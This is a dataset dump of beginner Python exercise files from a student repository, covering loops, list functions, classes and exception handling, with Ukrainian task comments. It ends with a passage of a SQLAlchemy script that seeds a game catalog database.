"text": "#!/usr/bin/python3.6\n\n'''1. Створити список цілих чисел,\n які вводяться з терміналу та визначити серед них максимальне та мінімальне число.'''\n\n\n# my_list = []\n# limit = int(input(\"count elements: \"))\n\n# for item in range(limit):\n# \tmy_list.append(int(input(\"enter your data in list: \")))\n# print(my_list)\n#print('Максимальне знчення списку: {} та мінімальне значення списку: {}'.format(max(my_list), min(my_list)))\n\n\n\n# limit = int(input(\"count elements: \"))\n# my_list = [int(input('enter your data in list: ')) for item in range(limit)]\n# print('Максимальне знчення списку: {} та мінімальне значення списку: {}'.format(max(my_list), min(my_list)))\n\n\n\n\n'''2. В інтервалі від 1 до 10 визначити числа \n• парні, які діляться на 2,\n• непарні, які діляться на 3, \n• числа, які не діляться на 2 та 3.'''\n\n\n# for item in range(1, 11):\n# \tif item % 2 != 0 and item % 3 != 0:\n# \t\tprint('числа, які не діляться на 2 та 3: {}'.format(item))\n# \telif item % 2 != 0 and item % 3 == 0:\n# \t\tprint('непарні, які діляться на 3: {}'.format(item))\n# \telif item % 2 == 0:\n# \t\tprint('парні, які діляться на 2: {}'.format(item))\n\n\n'''3. Написати програму, яка обчислює факторіал числа,\n яке користувач вводить.(не використовувати рекурсивного виклику функції)'''\n\n\n# user_numb = int(input(\"enter your data: \"))\n# item = 1\n# step = 1\n# while step <= user_numb:\n# \titem *= step\n# \tstep += 1\n# print(f\"Факторіал числа {user_numb} == {item}\")\n\n\n'''4. Напишіть скрипт, який перевіряє логін, який вводить користувач. \nЯкщо логін вірний (First), то привітайте користувача. \nЯкщо ні, то виведіть повідомлення про помилку. \n(використайте цикл while)'''\n\n\n# login = input(\"hello, enter login: \")\n\n# while login:\n# \tif login == 'First':\n# \t\tprint('Hello dear user)))')\n# \telse:\n# \t\tprint('Login error')\n# \tlogin = input(\"hello, enter login: \")"
},
{
"alpha_fraction": 0.6795918345451355,
"alphanum_fraction": 0.6918367147445679,
"avg_line_length": 24.6842098236084,
"blob_id": "3de0ce0bf1b474fcc35dff1d68d750a37d8dfcec",
"content_id": "29485382f935fa857452feb28cf06a9a6ed4d9fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 490,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 19,
"path": "/20.09_task3.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''Write a function taking in a string like WOW this is REALLY amazing and returning Wow this is really amazing. String s\nhould be capitalized and properly spaced. Using re and string is not allowed.'''\n\ndef no_yelling(txt):\n\tfirst_letter = txt[0]\n\tother_txt = txt[1:]\n\tres = first_letter.upper() + other_txt.lower()\n\treturn res\n\n# OR\n\n# def no_yelling(txt):\n# \treturn txt[0].upper() + txt[1:].lower()\n\n\nmy_txt = input(\"Enter your data: \")\nprint(no_yelling(my_txt))\n\n\n"
},
{
"alpha_fraction": 0.7054794430732727,
"alphanum_fraction": 0.715753436088562,
"avg_line_length": 32.730770111083984,
"blob_id": "911ad54455105904fcf144b28e6a7e0c1deb8ded",
"content_id": "5514868c61b0ee8e5439eb72039dbce503e84ea6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 876,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 26,
"path": "/18.09_task_1.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''You were camping with your friends far away from home, but when it's time to go back,\n you realize that you fuel is running out and the nearest pump is 50 miles away! You know that on average, \n your car runs on about 25 miles per gallon. There are 2 gallons left. \n Considering these factors, write a function that tells you if it is possible to get to the pump or not. \n Function should return true if it is possible and false if not.'''\n\n\ndef main(miles, gallons):\n \tone_gallon = 25\n \tres = gallons * one_gallon\n \tif res < miles:\n \t\treturn False\n \telse:\n \t\treturn True\n\n\n\nmiles = int(input('enter the number of miles: '))\ngallons = int(input('Enter the numb of gallons: '))\nwhile miles:\n\tresult = main(miles, gallons)\n\tprint(result)\n\tmiles = int(input('enter the number of miles again: '))\n\tgallons = int(input('Enter the numb of gallons again: '))"
},
{
"alpha_fraction": 0.6743295192718506,
"alphanum_fraction": 0.6819923520088196,
"avg_line_length": 17.714284896850586,
"blob_id": "5789d097ca2f58778de174c6217ba0110199f97c",
"content_id": "39bfebca60482bac69d331bcdb72b98b56cc18d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 261,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 14,
"path": "/01.10_task_1.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''Create a method is_uppercase() to see whether the string is ALL CAPS.'''\n\n\n\ndef upper(txt):\n\treturn txt.isupper()\n\n\nuser_data = input('Enter some word: ')\nwhile user_data:\n\tprint(upper(user_data))\n\tuser_data = input('Enter next word: ')"
},
{
"alpha_fraction": 0.4172413647174835,
"alphanum_fraction": 0.4241379201412201,
"avg_line_length": 21.384614944458008,
"blob_id": "12546e922ac2f83eb1fe7837fd1416b4b9e59a13",
"content_id": "c735812fedc71e87b029f9ea97ff67e68e0a30ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 290,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 13,
"path": "/introduction_task2.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\na = int(input(\"Enter number one: \"))\nb = int(input(\"Enter number two: \"))\n\nprint(\"a + b = \", (a + b))\nprint(\"a - b = \", (a - b))\nprint(\"a * b = \", (a * b))\nprint(\"a / b = \", (a / b))\n\nprint(\"a ** b = \", (a ** b))\nprint(\"a // b = \", (a // b))\nprint(\"a % b = \", (a % b))"
},
{
"alpha_fraction": 0.6076837778091431,
"alphanum_fraction": 0.658662736415863,
"avg_line_length": 28.434782028198242,
"blob_id": "ee012601a40eb42d118bb698a5f2acf0d801e964",
"content_id": "82add1a67b5054e7acb4daf7e2fca5b487a8b592",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3401,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 92,
"path": "/Class_work_5.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''1. Спробуйте переписати наступний код через map. Він приймає список реальних імен і замінює їх хеш-прізвищами, \nвикористовуючи більш надійний метод-хешування.\n\nnames = ['Sam', 'Don', 'Daniel'] \nfor i in range(len(names)): \n names[i] = hash(names[i]) \nprint(names) \n\n=> [6306819796133686941, 8135353348168144921, -1228887169324443034]'''\n\nnames = ['Sam', 'Don', 'Daniel']\nresult = map(lambda x: hash(x), names)\nprint(list(result))\n\n\n\n'''2. Вивести список кольору “red”, який найчастіше зустрічається в даному списку \n[“red”, “green”, “black”, “red”, “brown”, “red”, “blue”, “red”, “red”, “yellow” ] використовуючи функцію filter.'''\n\ncolor = ['red', 'green', 'black', 'red', 'brown', 'red', 'blue', 'red', 'red', 'yellow']\ndef color_f(clr):\n\treturn clr == 'red'\nresult = filter(color_f, color)\nprint(list(result))\n\n'''3. Всі ці числа в списку мають стрічковий тип даних, наприклад [‘1’,’2’,’3’,’4’,’5’,’7’], перетворити цей список в список, всі числа якого мають тип даних integer:\n1) використовуючи метод append\n2) використовуючи метод map'''\n\n#1)\nmy_list = ['1', '2', '3', '4', '5', '6', '7']\nnew_list = []\nfor item in range(len(my_list)):\n\tnew_list.append(int(my_list[item]))\nprint(new_list)\n\n#2)\nmy_list = ['1', '2', '3', '4', '5', '6', '7']\nresult = map(lambda item: int(item) , my_list)\n#or\nresult = map(int, my_list)\nprint(list(result))\n\n\n\n'''4. Перетворити список, який містить милі , в список, який містить кілометри (1 миля=1.6 кілометра)\na) використовуючи функцію map\nb) використовуючи функцію map та lambda'''\n\nmiles = [12, 32, 45, 4]\nresult = map(lambda item: item * 1.6, miles)\nprint(list(result))\n\ndef kilometer_f(val):\n\treturn val * 1.6\n\nmiles = [12, 32, 45, 4]\nresult = map(kilometer_f, miles)\nprint(list(result))\n\n\n\n'''5. Знайти найбільший елемент в списку використовуючи функцію reduce'''\n\nfrom functools import reduce\nmy_list = [1, 32, 67, 10, 43, 100, 382]\nresult = reduce(lambda a, x: a if a > x else x, my_list)\nprint(result)\n\n'''6. Перепишіть наступний код, використовуючи map, reduce і filter. Filter приймає функцію і колекцію. \nПовертає колекцію тих елементів, для яких функція повертає True.'''\n\nfrom functools import reduce\npeople = [{'name': 'Sam', 'height': 160}, {'name': 'Alex', 'height': 80}, {'name': 'Jack'}] \n# height_total = 0 \n# height_count = 0 \n# for person in people: \n# if 'height' in person: \n# height_total += person['height'] \n# height_count += 1 \n# print(height_total)\n# print(height_count)\n\n\nresult = list(filter(lambda x: 'height' in x, people))\nprint(result)\nresult_2 = list(map(lambda item : item['height'], result))\nprint(result_2)\nresult_3 = reduce(lambda a, x: a + x, result_2)\nprint(result_3)"
},
{
"alpha_fraction": 0.6499999761581421,
"alphanum_fraction": 0.6590909361839294,
"avg_line_length": 21.100000381469727,
"blob_id": "ccdcaf4bfb10a4128f547501f5c32c15014c5182",
"content_id": "013da3d7af1b3c68efcb383c267bd40d11756727",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 10,
"path": "/massage.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\ndef greeting(name):\n\tif name == 'johnny' or name == 'Johnny':\n\t\treturn 'Hello dear {}'.format(name)\n\telse:\n\t\treturn f'Hello {name}'\n\nuser_name = input('Enter your name: ')\nprint(greeting(user_name))"
},
{
"alpha_fraction": 0.6912928819656372,
"alphanum_fraction": 0.7071239948272705,
"avg_line_length": 22.75,
"blob_id": "8a2b0b8e57a46ba8addafb7807123646c818f130",
"content_id": "18b97fbf064643fbe73ea414b539d06f7e735c5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 379,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 16,
"path": "/03.10_task1.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''Create a class Ball.\n\nBall objects should accept one argument for \"ball type\" when instantiated.\n\nIf no arguments are given, ball objects should instantiate with a \"ball type\" of \"regular.\"'''\n\nclass Ball():\n\tdef __init__(self, type = 'regular'):\n\t\tself.ball_type = type\n\nball1 = Ball()\nball2 = Ball('super')\nprint(ball1.ball_type)\nprint(ball2.ball_type)"
},
{
"alpha_fraction": 0.6803069114685059,
"alphanum_fraction": 0.6982097029685974,
"avg_line_length": 25.133333206176758,
"blob_id": "e157fb14939203d1f940a8cac5f64ed6b965f486",
"content_id": "24c1a2f36457cb02e3874c60572e3c0febca3ff2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 391,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 15,
"path": "/27.09_task1.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''Write a program that finds the summation of every number from 1 to num. \nThe number will always be a positive integer greater than 0.'''\n\ndef summation(num):\n\tres = 0\n\tfor item in range(1, num + 1):\n\t\tres += item\n\treturn res\n\nuser_input = int(input('Enter some digit: '))\nwhile user_input:\n\tprint(summation(user_input))\n\tuser_input = int(input('Enter some digit: '))"
},
{
"alpha_fraction": 0.6648250222206116,
"alphanum_fraction": 0.6795580387115479,
"avg_line_length": 19.923076629638672,
"blob_id": "3c62c5a2891f68e48a47fb381b0357a497988539",
"content_id": "bda70958be5d9e803055ff89c009c282b1fdfdfd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 543,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 26,
"path": "/03.10_task_3.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''Create a class Ghost\n\nGhost objects are instantiated without any arguments.\n\nGhost objects are given a random color attribute of white\" or \"yellow\" or \"purple\" or \"red\" when instantiated'''\n\n\nfrom random import randint\n\nclass Ghost():\n\tdef __init__(self):\n\t\tself.color = randint(1, 4)\n\tdef color_ghost(self):\n\t\tif self.color == 1:\n\t\t\treturn 'White'\n\t\telif self.color == 2:\n\t\t\treturn 'Yellow'\n\t\telif self.color == 3:\n\t\t\treturn 'Purple'\n\t\telif self.color == 4:\n\t\t\treturn 'Red'\n\nghost = Ghost()\nprint(ghost.color_ghost())"
},
{
"alpha_fraction": 0.6696832776069641,
"alphanum_fraction": 0.6764705777168274,
"avg_line_length": 25.058822631835938,
"blob_id": "0e76e2a3e57470fd7ee195aea04d923a50c628a7",
"content_id": "80814dc4aa712e5e0f4532fd8dfdd08139c77e13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 442,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 17,
"path": "/18.09_task_3.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''Create a function which answers the question \"Are you playing banjo?\".\nIf your name starts with the letter \"R\" or lower case \"r\", you are playing banjo!'''\n\n\ndef banjo(name):\n\tprint('Are you playing banjo')\n\tfirst_letter = name[0]\n\tif first_letter == 'R' or first_letter == 'r':\n\t\treturn name + ' plays banjo'\n\telse:\n\t\treturn name + ' doesn`t play banjo'\n\nprint(banjo('ron'))\nprint(banjo('Ron'))\nprint(banjo('Dmkop'))"
},
{
"alpha_fraction": 0.6846755146980286,
"alphanum_fraction": 0.6955487728118896,
"avg_line_length": 24.824562072753906,
"blob_id": "af8dde826097968070e98d348762c9825c2f3a9b",
"content_id": "e96158a296b16aef2c70b3d356cc0e4c22e9ea6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3712,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 114,
"path": "/Class_work_exception.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n'''1. Напишіть програму, яка пропонує користувачу ввести ціле число і визначає чи це число парне чи непарне, чи введені дані коректні.'''\n\ndef except_func():\n\ttry:\n\t\tuser_input_data = int(input('Enter your data: '))\n\texcept ValueError:\n\t\tprint('Invalid data')\n\telse:\n\t\tif user_input_data % 2 == 0:\n\t\t\tprint('Even')\n\t\telif user_input_data % 2 != 0:\n\t\t\tprint('Odd')\n\tfinally:\n\t\tprint('End')\n\nexcept_func()\n\n'''2. Напишіть програму, яка пропонує користувачу ввести свій вік, після чого виводить повідомлення про те чи вік є парним чи непарним числом. \nНеобхідно передбачити можливість введення від’ємного числа, в цьому випадку згенерувати власну виняткову ситуацію. \nГоловний код має викликати функцію, яка обробляє введену інформацію.'''\n\nclass Negative_valeu(Exception):\n\tdef __init__(self, data):\n\t\tself.data = data\n\tdef __repr__(self):\n\t\treturn self.data\n\nclass Too_big(Exception):\n\tdef __init__(self, usr_data):\n\t\tself.usr_data = usr_data\n\tdef __repr__(self):\n\t\treturn self.usr_data\n\ntry:\n\tuser_age = int(input('Enter your age: '))\n\n\tif user_age < 0:\n\t\traise Negative_valeu(\"Age can't be negative\")\n\n\tif user_age >= 200:\n\t\traise Too_big('Can`t be a liar')\n\nexcept Negative_valeu as neg:\n\t\tprint('Result: {}'.format(neg.data))\n\nexcept Too_big as bg:\n\tprint(bg.usr_data)\n\nelse:\n\tif user_age % 2 == 0:\n\t\tprint('Your age is even value')\n\telif user_age % 2 == 1:\n\t\tprint('your age is odd value')\nfinally:\n\tprint('End)))')\n\n\n'''3. Напишіть програму для обчислення частки двох чисел, які вводяться користувачем послідовно через кому, \nпередбачити випадок ділення на нуль, \nвипадки синтаксичних помилок та випадки інших виняткових ситуацій. \nВикористати блоки else та finaly.'''\n\ndef fraction(*args):\n\ttry:\n\t\tres = args[0] / args[1]\n\texcept ZeroDivisionError:\n\t\tprint('division by zero is impossible')\n\texcept ValueError:\n\t\tprint('Please enter digit value')\n\texcept TypeError:\n\t\tprint('invalid data string is present')\n\telse:\n\t\tprint('Your result = {}'.format(res))\n\tfinally:\n\t\tprint('The end of the program')\nfraction()\n\n\n'''4. Написати програму, яка аналізує введене число та в залежності від числа видає день тижня, \nякий відповідає цьому числу (1 це Понеділок, 2 це Вівторок і т.д.) . \nВрахувати випадки введення чисел від 8 і більше, а також випадки введення не числових даних.'''\n\nclass More(Exception):\n\tdef __init__(self, data):\n\t\tself.data = data\n\tdef __repr__(self):\n\t\treturn self.data\n\ntry:\n\tuser_data = int(input(\"Enter your data: \"))\n\tif user_data >= 8:\n\t\traise More('the value must be less than 8')\nexcept More as M:\n\tprint(M.data)\nexcept ValueError:\n\tprint('Must be digits')\nelse:\n\tif user_data == 1:\n\t\tprint('Monday')\n\telif user_data == 2:\n\t\tprint('Tuesday')\n\telif user_data == 3:\n\t\tprint('Wednesday')\n\telif user_data == 4:\n\t\tprint('Thursday')\n\telif usr_data == 5:\n\t\tprint('Friday')\n\telif user_data == 6:\n\t\tprint(\"Saturday\")\n\telif user_data == 7:\n\t\tprint('Sunday')\nfinally:\n\tprint('The end of the program')"
},
{
"alpha_fraction": 0.6212424635887146,
"alphanum_fraction": 0.6392785310745239,
"avg_line_length": 21.727272033691406,
"blob_id": "f4bfacdfb0ee07f95a0410e5352006f11cbe541b",
"content_id": "2a5ecae363de09bdb4bdf1a201d8a2a9bd093d28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 499,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 22,
"path": "/convert_number_ to_string.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''We need a function that can transform a number into a string.\n\nWhat ways of achieving this do you know?'''\n\nnumb = int(input('Enter data: '))\nwhile numb:\n\tres = str(numb)\n\tprint('Number {} has {}'.format(res, type(res)))\n\tnumb = int(input('Enter next data: '))\n\n\t\t\t\t#OR function\n\n# def convert(numb1):\n# \tif type(numb1) == int or type(numb1) == float:\n# \t\tconv = str(numb1)\n# \tprint(f\"Number {numb1} has {type(conv)}\")\n\n# numb1 = int(input(\"enter data: \"))\n\n# convert(numb1)"
},
{
"alpha_fraction": 0.5972515940666199,
"alphanum_fraction": 0.621564507484436,
"avg_line_length": 23.86842155456543,
"blob_id": "dd8b6e9010f944591d60dde0caf9a4bde9f83040",
"content_id": "aa1dff76279a8ef15dec14865c61c473637430f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 946,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 38,
"path": "/20.09_task2.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\ndef game():\n\n\t\"\"\"In this game, there are 21 sticks lying in a pile. \nPlayers take turns taking 1, 2, or 3 sticks. The last person to take a stick wins.\"\"\"\n\n\tsticks = 21\n\tplayers = input('enter player number: ')\n\tfor item in range(sticks):\n\t\tif players == '1':\n\t\t\tpl_1 = int(input('player one, enter your data: '))\n\t\t\tif pl_1 > 3:\n\t\t\t\tprint('you can only enter one two or three, try agaen')\n\t\t\t\tcontinue\n\t\t\telif sticks == 0:\n\t\t\t\tprint('player one is WINNER')\n\t\t\t\tbreak\n\t\t\tprint(sticks)\n\t\t\tsticks -= pl_1\n\t\t\tprint(f'Player one takes {pl_1}')\n\n\t\telif players == '2':\n\t\t\tpl_2 = int(input('player two, enter your data: '))\n\t\t\tprint(sticks)\n\t\t\tif pl_2 > 3:\n\t\t\t\tprint('you can only enter one two or three, try agaen')\n\t\t\t\tcontinue\n\t\t\telif sticks == 0:\n\t\t\t\tprint('player two is WINNER')\n\t\t\t\tbreak\n\t\t\tsticks -= pl_2\n\t\t\tprint(f'Player two takes {pl_2}')\n\n\t\tplayers = input('enter player number: ')\n\nprint(game.__doc__)\nprint(game())\n\n"
},
{
"alpha_fraction": 0.7026476860046387,
"alphanum_fraction": 0.7107942700386047,
"avg_line_length": 26.33333396911621,
"blob_id": "20c08c19e156d587fb9a63d01072b72cc4990733",
"content_id": "40990770c396f760e83a91179461866aa02cbf7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 491,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 18,
"path": "/30.10_task_4.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''Task\nYour task is to complete this Class, the Person class has been created. \nYou must fill in the Constructor method to accept a name as string and an age as number, \ncomplete the get Info property and getInfo method/Info getter which should return'''\n\n\nclass Person():\n\tdef __init__(self, name, age):\n\t\tself.name = name\n\t\tself.age = age\n\t@property\n\tdef info(self):\n\t\treturn '{} age is {}'.format(self.name, self.age)\n\nfirst = Person('Dmytro', 25)\nprint(first.info)"
},
{
"alpha_fraction": 0.727979302406311,
"alphanum_fraction": 0.7318652868270874,
"avg_line_length": 32.5217399597168,
"blob_id": "4cd4e4fccf8d079e45ddfcdcb060f7e990cd6377",
"content_id": "47ffd1e972e61e297f15d77a1da18997d2a1489a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 772,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 23,
"path": "/18.09_task_6.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n\n'''Some new animals have arrived at the zoo. The zoo keeper is concerned that perhaps the animals do not have the right tails. \nTo help her, you must correct the broken function to make sure that the second argument (tail), \nis the same as the last letter of the first argument (body) - otherwise the tail wouldn't fit!\n\nIf the tail is right return true, else return false.\n\nThe arguments will always be strings, and normal letters.\n\nFor Haskell, body has the type of String and tail has the type of Char. For Go, body has type string and tail has type rune.'''\n\n\ndef correct_tail(body, tail):\n\tlast_letter = body[-1]\n\tif last_letter == tail:\n\t\treturn True\n\telse:\n\t\treturn False\n\nprint(correct_tail('fox', 'x'))\nprint(correct_tail('Giraffe', 's'))\n\n"
},
{
"alpha_fraction": 0.685245931148529,
"alphanum_fraction": 0.7180327773094177,
"avg_line_length": 20.785715103149414,
"blob_id": "790c5441f6a1ebb14eb9ffac943be749e9825ea3",
"content_id": "391b982d6700016d45d383fdcf83b8537be43b65",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 355,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 14,
"path": "/lesson_3_task_2.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\nnumber = 3752\n\nchange_type = list(str(number))\n\nprint(int(change_type[0]) + int(change_type[1]) + int(change_type[2]) + int(change_type[3])) # стосовно даного завдання не впевнений чи зробив правильно\n\nchange_type.reverse()\nprint(change_type)\n\n\nchange_type.sort()\nprint(change_type)\n"
},
{
"alpha_fraction": 0.6528081893920898,
"alphanum_fraction": 0.668854832649231,
"avg_line_length": 20.77777862548828,
"blob_id": "b3c6f5bbb1e3afadfe0db6a837f232b4339f2c67",
"content_id": "382457b0f1faa99b2fee977026c4f8b7364dcdd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1573,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 63,
"path": "/Class_work_OOP.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''Створити батьківський клас Figure з методами init: ініціалізується колір, \nget_color: повертає колір фігури,\ninfo: надає інформацію про фігуру та колір, \nвід якого наслідуються такі класи як Rectangle, \nSquare, які мають інформацію про ширину, висоту фігури, метод square, який знаходить площу фігури.'''\n\n\n\nclass Figure:\n\n\tdef __init__(self, color):\n\t\tself.color = color\n\n\tdef get_color(self):\n\t\treturn self.color\n\n\tdef info(self):\n\t\tprint('Figure')\n\t\tprint('Color is: '+ self.color)\n\n\n\nclass Rectangle(Figure):\n\tdef __init__(self, color, width = 100, height = 100):\n\t\tsuper().__init__(color)\n\t\tself.width = width\n\t\tself.height = height\n\n\tdef area(self):\n\t\treturn self.width * self.height\n\n\tdef info(self):\n\t\tprint('Rectangle')\n\t\tprint('Color: ' + self.color)\n\t\tprint('Width : {}'.format(self.width))\n\t\tprint('Height: {}'.format(self.height))\n\t\tprint('Square: {}'.format(self.area()))\n\n\nclass Square(Figure):\n\tdef __init__(self, color, width):\n\t\tsuper().__init__(color)\n\t\tself.width = width\n\n\tdef area(self):\n\t\treturn self.width ** 2\n\n\tdef info(self):\n\t\tprint('Square')\n\t\tprint('Color is {}'.format(self.color))\n\t\tprint('Width and height: {}'.format(self.width))\n\t\tprint('Square: {}'.format(self.area()))\n\n\nfig1 = Figure('red')\nprint(fig1.info())\nfig2 = Rectangle('red', 89, 45)\nprint(fig2.info())\n\nfig3 = Square('blue', 200)\nprint(fig3.info())"
},
{
"alpha_fraction": 0.7142857313156128,
"alphanum_fraction": 0.7181467413902283,
"avg_line_length": 36,
"blob_id": "83932fa6f800378562c956548b0da61cfc171df4",
"content_id": "c8b79ec18d942e13478e741b05aac866473dd519",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 518,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 14,
"path": "/01.10_task_2.py",
"repo_name": "Dmkop/Python_core",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\n\n'''HELP! Jason can't find his textbook! It is two days before the test date, and Jason's textbooks are all out of order! \nHelp him sort a list (ArrayList in java) full of textbooks by subject, so he can study before the test.\n\nThe sorting should NOT be case sensitive'''\n\ntextbooks_list = ['Java', 'C++', 'c', 'Python', 'paskal', 'javascript']\ndef sort_list(textbooks):\n\tsorted_list = [item.lower() for item in textbooks]\n\tsorted_list.sort()\n\treturn sorted_list\n\nprint(sort_list(textbooks_list))\n"
}
] | 33 |
AbdelrahmanKhalil96/Item_catalog_Error_fixed | https://github.com/AbdelrahmanKhalil96/Item_catalog_Error_fixed | b9035ebbbac7d4754bb080aeaf0aa2c60ad4871e | b13315da716757925b007de773ef0963dd9ea48f | 9d9122236d116624ef02e4e87e7f4d7ca0db49f8 | refs/heads/master | 2020-08-03T20:41:28.610738 | 2019-09-30T14:34:46 | 2019-09-30T14:34:46 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6259920597076416,
"alphanum_fraction": 0.633399486541748,
"avg_line_length": 43.21052551269531,
"blob_id": "d2f11f57f51f4c39156d72a588f28ce6e2b9adac",
"content_id": "c01b1c477d5d639f106ee0a1b9add9fe04f1ccc9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15120,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 342,
"path": "/lotsofdata.py",
"repo_name": "AbdelrahmanKhalil96/Item_catalog_Error_fixed",
"src_encoding": "UTF-8",
"text": "from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom database_setup import User, Base, Category, Item\n\nengine = create_engine('sqlite:///itemcat.db')\n# Bind the engine to the metadata of the Base class so that the\n# declaratives can be accessed through a DBSession instance\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\n# A DBSession() instance establishes all conversations with the database\n# and represents a \"staging zone\" for all the objects loaded into the\n# database session object. Any change made against the objects in the\n# session won't be persisted into the database until you call\n# session.commit(). If you're not happy about the changes, you can\n# revert all of them back to the last commit by calling\n# session.rollback()\nsession = DBSession()\n\n# res name, id menu name id description price\n\n# Category of MMO\ncategory1 = Category(user_id=1, name=\"MMO\")\n\nsession.add(category1)\nsession.commit()\n\nitem2 = Item(user_id=1, name=\"Dauntless\", description=\"\"\"Gather your friends, forge your\n weapons, and hunt ferocious behemoths in Dauntless,\n the co op multiplayer RPG from Phoenix Labs,\n a studio consisting of developers from some\n of the biggest MMORPG ever made\"\"\", category=category1)\n\nsession.add(item2)\nsession.commit()\n\n\nitem1 = Item(user_id=1, name=\"Crossout\", description=\"\"\"Neverwinter is\n an action MMORPG based on the acclaimed Dungeons\n and Dragons universe. In Neverwinter you take on the role as\n a mighty hero who must set out to protect\n the lands of Neverwinter\n from those who conspire to see it\n destroyed\"\"\", category=category1)\n\nsession.add(item1)\nsession.commit()\n\nitem3 = Item(user_id=1, name=\"Neverwinter\", description=\"\"\"Neverwinter\n is an action MMORPG based on the acclaimed Dungeons\n and Dragons universe. In Neverwinter you take on the\n role as a mighty hero who must set out to protect\n the lands of Neverwinter from those who conspire\n to see it destroyed\"\"\", category=category1)\n\nsession.add(item3)\nsession.commit()\n\nitem4 = Item(user_id=1, name=\"Guild Wars 2\",\n description=\"\"\"Guild Wars 2 represents ArenaNets\n attempt to turn MMO convention on its ears and create\n an engaging game for players of all skill levels\n and play styles\"\"\", category=category1)\n\nsession.add(item4)\nsession.commit()\n\n\n# Category of Simulations\ncategory2 = Category(user_id=1, name=\"Simulations\")\n\nsession.add(category2)\nsession.commit()\n\n\nitem1 = Item(user_id=1, name=\"The Sims\",\n description=\"basicly full life simulation\", category=category2)\n\nsession.add(item1)\nsession.commit()\n\n\n# Category of adventure\ncategory3 = Category(user_id=1, name=\"adventure\")\n\nsession.add(category3)\nsession.commit()\n\n\nitem1 = Item(user_id=1, name=\"Life is Strange\", description=\"\"\"\"Life is Strange\n was one of the biggest surprises of the last few years,\n Its the story of a nervous girl who discovers 